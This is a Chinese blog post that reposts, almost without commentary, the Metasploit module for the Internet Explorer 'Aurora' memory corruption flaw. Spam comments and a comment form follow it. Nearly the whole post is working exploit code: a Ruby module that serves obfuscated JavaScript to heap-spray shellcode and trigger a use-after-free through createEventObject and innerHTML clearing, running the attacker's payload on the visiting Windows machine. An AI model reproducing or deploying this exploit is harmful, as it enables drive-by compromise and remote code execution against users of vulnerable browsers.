Aurora 确定了

##看到HDM的这个可以确定了 ,世界又要开始新的一轮疯狂了
# $Id: ie_aurora.rb 8136 2010-01-15 21:36:04Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking

        include Msf::Exploit::Remote::HttpServer::HTML
        include Msf::Exploit::Remote::BrowserAutopwn
        autopwn_info({
                :ua_name    => HttpClients::IE,
                :ua_minver  => "6.0",
                :ua_maxver  => "8.0",
                :javascript => true,
                :os_name    => OperatingSystems::WINDOWS,
                :vuln_test  => nil, # no way to test without just trying it
        })


        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Microsoft Internet Explorer "Aurora" Memory Corruption',
                        'Description'    => %q{
                                This module exploits a memory corruption flaw in Internet Explorer. This
                        flaw was found in the wild.
                        },
                        'License'        => MSF_LICENSE,
                        'Author'         =>
                                [
                                        'unknown',
                                        'hdm'      # Metasploit port
                                ],
                        'Version'        => '$Revision: 8136 $',
                        'References'     =>
                                [
                                        ['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
                                        ['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']

                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 1000,
                                        'BadChars' => "\x00",
                                        'Compat'   =>
                                                {
                                                        'ConnectionType' => '-find',
                                                },
                                        'StackAdjustment' => -3500,
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [
                                        [ 'Automatic', { }],
                                ],
                        'DisclosureDate' => 'Jan 14 2009', # wepawet sample
                        'DefaultTarget'  => 0))
        end

        def on_request_uri(cli, request)

                if (request.uri.match(/\.gif/i))
                        data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
                        send_response(cli, data, { 'Content-Type' => 'image/gif' })
                        return
                end

                var_memory    = rand_text_alpha(rand(100) + 1)
                var_boom      = rand_text_alpha(rand(100) + 1)
                var_x1        = rand_text_alpha(rand(100) + 1)
                var_e1        = rand_text_alpha(rand(100) + 1)
                var_e2        = rand_text_alpha(rand(100) + 1)

                var_comment   = rand_text_alpha(rand(100) + 1);
                var_abc       = rand_text_alpha(3);

                var_ev1       = rand_text_alpha(rand(100) + 1)
                var_ev2       = rand_text_alpha(rand(100) + 1)
                var_sp1       = rand_text_alpha(rand(100) + 1)

                var_unescape  = rand_text_alpha(rand(100) + 1)
                var_shellcode = rand_text_alpha(rand(100) + 1)
                var_spray     = rand_text_alpha(rand(100) + 1)
                var_start     = rand_text_alpha(rand(100) + 1)
                var_i         = rand_text_alpha(rand(100) + 1)

                rand_html     = rand_text_english(rand(400) + 500)

                html = %Q|<html>
<head>
<script>

        var #{var_comment} = "COMMENT";

        var #{var_x1} = new Array();
        for (i = 0; i < 200; i ++ ){
           #{var_x1} = document.createElement(#{var_comment});
           #{var_x1}.data = "#{var_abc}";
        };

        var #{var_e1} = null;

        var #{var_memory} = new Array();
        var #{var_unescape} = unescape;

        function #{var_boom}() {

                var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');

                var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );

                do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );

                for(#{var_i} = 0; #{var_i} < 100; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
        }

        function #{var_ev1}(evt){
                #{var_boom}();
            #{var_e1} = document.createEventObject(evt);
            document.getElementById("#{var_sp1}").innerHTML = "";
            window.setInterval(#{var_ev2}, 50);
        }

        function #{var_ev2}(){
          p = "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
          for (i = 0; i < #{var_x1}.length; i ++ ){
              #{var_x1}.data = p;
          }

          var t = #{var_e1}.srcElement;
        }
</script>
</head>
<body>

<span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span></body></html>

</body>
</html>
                |

                # Transmit the compressed response to the client
                send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

                # Handle the payload
                handler(cli)
        end
end

文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
评论: 39 | 引用: 0 | 查看次数: 9257
回复回复Fran[2017-12-11 06:43 AM | del]
Thank you for sharing your amazing websites.
回复回复Alvaro[2017-12-04 04:17 PM | del]
Great website! It looks really expert! Keep up the helpful work!
回复回复Trisha[2017-12-02 01:19 AM | del]
Thanks, this site is extremely handy.
回复回复Jade[2017-11-28 05:18 PM | del]
Unbelievably individual pleasant website. Immense details available on couple of clicks.
回复回复Maddison[2017-11-24 08:30 PM | del]
Your information is amazingly unique.
回复回复Betsey[2017-11-06 07:32 AM | del]
You have one of the best webpages.
回复回复Lena[2017-04-30 05:43 AM | del]
What's up everyone, it's my first visit at this web site, and piece of writing is truly fruitful for me, keep up posting these types of articles.
回复回复Russel[2017-03-31 12:05 AM | del]
Hello there! I could have sworn I've been to this blog before but after browsing through some of the post I realized it's new to me.
Anyways, I'm definitely glad I found it and I'll be book-marking and checking back frequently!
回复回复Tosha[2017-03-27 11:50 PM | del]
You can certainly see your expertise within the work you write.

The arena hopes for even more passionate writers like you who aren't afraid to mention how they believe. All the time follow your heart.
回复回复Horacio[2017-03-13 12:50 AM | del]
Hello there! This is my first visit to your blog!
We are a collection of volunteers and starting a new initiative in a community in the same niche. Your blog provided us useful information to work on. You have done a wonderful job!
发表评论
昵 称:
密 码: 游客发言不需要密码.
内 容:
验证码: 验证码
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭